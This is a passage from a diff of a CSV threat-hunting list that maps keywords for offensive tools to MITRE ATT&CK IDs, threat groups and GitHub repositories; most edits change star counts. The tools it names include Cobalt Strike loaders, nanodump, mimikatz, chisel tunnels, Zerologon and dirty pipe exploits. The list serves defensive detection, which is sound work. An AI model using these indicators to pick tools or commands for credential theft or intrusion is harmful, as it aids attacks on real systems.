APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1068","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z"
+"*check_and_write_IAT_Hook*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z"
 "*check_cve-2020-1472.py*","offensive_tool_keyword","POC","Zerologon CVE exploitation","T1210 - T1072","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/WiIs0n/Zerologon_CVE-2020-1472","1","1","N/A","N/A","1","10","5","2020-10-05T07:47:02Z","2020-09-29T18:45:44Z"
 "*check_function ntdll.dll EtwEventWrite*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","0","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z"
 "*check_ppl_requirements*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z"
-"*checkIfHiddenAPICall*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","820","138","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z"
+"*checkIfHiddenAPICall*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z"
 "*Check-LocalAdminHash.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z"
 "*CheckPlease*","offensive_tool_keyword","CheckPlease","This repository is for defenders to harden their sandboxes and AV tools. malware researchers to discover new techniques. and red teamers to get serious about their payloads.","T1497 - T1027 - T1055 - T1059","TA0010 - ","N/A","N/A","Information Gathering","https://github.com/Arvanaghi/CheckPlease","1","0","N/A","N/A","9","861","187","2021-06-01T15:06:44Z","2017-03-13T22:51:30Z"
 "*CheckPort.csproj*","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","N/A","Exploitation tools","https://github.com/cube0x0/KrbRelay","1","1","N/A","N/A","8","751","109","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z"
@@ -8405,42 +8553,42 @@ "*CheeseTools.sln*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","1","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" "*CheeseTools-master*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","1","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" "*chenjiandongx/sniffer*","offensive_tool_keyword","sniffer","A modern alternative network traffic sniffer.","T1040 - T1052.001 - T1046 - T1552.002","TA0011 - TA0007 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/chenjiandongx/sniffer","1","1","N/A","N/A","7","668","58","2022-07-27T15:13:57Z","2021-11-08T15:36:03Z" -"*Chimera-main.zip*","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","1","N/A","9","3","280","41","2023-09-21T14:01:23Z","2023-05-15T13:02:54Z" -"*Chimera-master.zip*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1187","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" -"*chisel -*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - 
TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9891","1162","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" -"*chisel client -*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9891","1162","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" -"*chisel client http*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9891","1162","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" -"*chisel server -*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9891","1162","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*Chimera-main.zip*","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","1","N/A","9","3","282","41","2023-09-21T14:01:23Z","2023-05-15T13:02:54Z" +"*Chimera-master.zip*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"*chisel -*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - 
TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*chisel client -*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*chisel client http*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*chisel server -*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" "*chisel.exe *","offensive_tool_keyword","AD exploitation cheat sheet","Chisel proxying - on our compromised target system we connect to this server and tell it to proxy all traffic over it via the reverse SOCKS5 tunnel.","T1071 - T1090 - T1102","N/A","N/A","N/A","POST Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*chisel.exe client*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9891","1162","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" -"*chisel.exe server*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - 
TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9891","1162","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" -"*chisel.jpillora.com*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","9891","1162","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" -"*chisel_1*_darwin_*.gz*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9891","1162","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" -"*chisel_1*_linux_*.gz*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9891","1162","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" -"*chisel_linux_amd64*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","9891","1162","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" -"*chisel_windows_amd64.exe*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","9891","1162","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" -"*chisel-master.zip*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","9891","1162","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*chisel.exe client*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - 
T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*chisel.exe server*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*chisel.jpillora.com*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*chisel_1*_darwin_*.gz*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*chisel_1*_linux_*.gz*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*chisel_linux_amd64*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*chisel_windows_amd64.exe*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*chisel-master.zip*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over 
HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" "*chknull.zip*","offensive_tool_keyword","ChkNull","Checks for Users with No passwords","T1078 - T1201","TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/classic_hacking_tools","1","1","N/A","N/A","1","2","0","2023-04-16T02:15:42Z","2023-04-16T01:49:12Z" "*chmod +x dirty*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1533","TA0003","N/A","N/A","Exploitation tools","https://github.com/febinrev/dirtypipez-exploit","1","0","N/A","N/A","1","41","21","2022-03-08T11:52:22Z","2022-03-08T11:49:40Z" "*chmod 666 /var/run/utmp~*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file Anti forensic: Manipulate utmp","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Defense Evasion","https://github.com/x0rz/EQGRP/blob/master/Linux/doc/old/etc/user.tool.dubmoat.COMMON","1","0","N/A","N/A","10","4011","2166","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" -"*chmod 700 lse.sh*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2924","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"*chmod 700 lse.sh*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" "*chmod 700 nscd crond*","offensive_tool_keyword","EQGRP tools","Equation 
Group hack tool leaked by ShadowBrokers - EncTelnet/Poptop To use Nopen over an existing connection","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Shell spawning","https://github.com/thePevertedSpartan/EQ1/blob/0c2354ff1073099b2aa417030b3167ec29d7279c/Linux/doc/old/etc/user.tool.poptop.COMMON","1","0","N/A","N/A","1","0","1","2017-11-12T08:13:06Z","2017-11-12T08:10:08Z" -"*chmod 755 lse.sh*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2924","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" -"*choco install * common.fireeye*","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","0","N/A","N/A","10","6323","1248","2023-10-03T19:02:49Z","2019-03-26T22:36:32Z" -"*chocobo_root.c","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*chocolate.kirbi*","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*chmod 755 lse.sh*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"*choco install * common.fireeye*","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","0","N/A","N/A","10","6326","1249","2023-10-03T19:02:49Z","2019-03-26T22:36:32Z" +"*chocobo_root.c","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*chocolate.kirbi*","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" "*Choosing DLL to hijack.*","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","0","N/A","10","2","119","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" "*chown root %s chmod 4755 %s %s*","offensive_tool_keyword","EQGR","Equation Group hack tool leaked by ShadowBrokers- file elgingamble","T1213.001 - T1203.001","TA0001 - TA0003","N/A","N/A","Shell 
spawning","https://fdik.org/EQGRP/Linux/doc/old/etc/user.tool.elgingamble.COMMON","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*chrismaddalena/SharpCloud*","offensive_tool_keyword","SharpCloud","Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.","T1083 - T1059.001 - T1114.002","TA0007 - TA0002 ","N/A","N/A","Credential Access","https://github.com/chrismaddalena/SharpCloud","1","1","N/A","10","2","154","27","2018-09-18T02:24:10Z","2018-08-20T15:06:22Z" "*chrispetrou/HRShell*","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","1","N/A","10","10","244","73","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" "*chrome_creds.txt*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" -"*chromecertbeggar.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*chromecertbeggar2.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*chromecertbeggar.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*chromecertbeggar2.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" "*ChromeDump.git*","offensive_tool_keyword","chromedump","ChromeDump is a small tool to dump all JavaScript and other ressources going through the browser","T1059.007 - T1114.001 - T1518.001 - T1552.002","TA0005 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/g4l4drim/ChromeDump","1","1","N/A","N/A","1","54","1","2023-06-30T09:07:59Z","2023-01-26T20:44:06Z" "*chromedump.py*","offensive_tool_keyword","chromedump","ChromeDump is a small tool to dump all JavaScript and other ressources going through the browser","T1059.007 - T1114.001 - T1518.001 - T1552.002","TA0005 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/g4l4drim/ChromeDump","1","1","N/A","N/A","1","54","1","2023-06-30T09:07:59Z","2023-01-26T20:44:06Z" "*ChromeDump-main.zip*","offensive_tool_keyword","chromedump","ChromeDump is a small tool to dump all JavaScript and other ressources going through the browser","T1059.007 - T1114.001 - T1518.001 - T1552.002","TA0005 - TA0009 - 
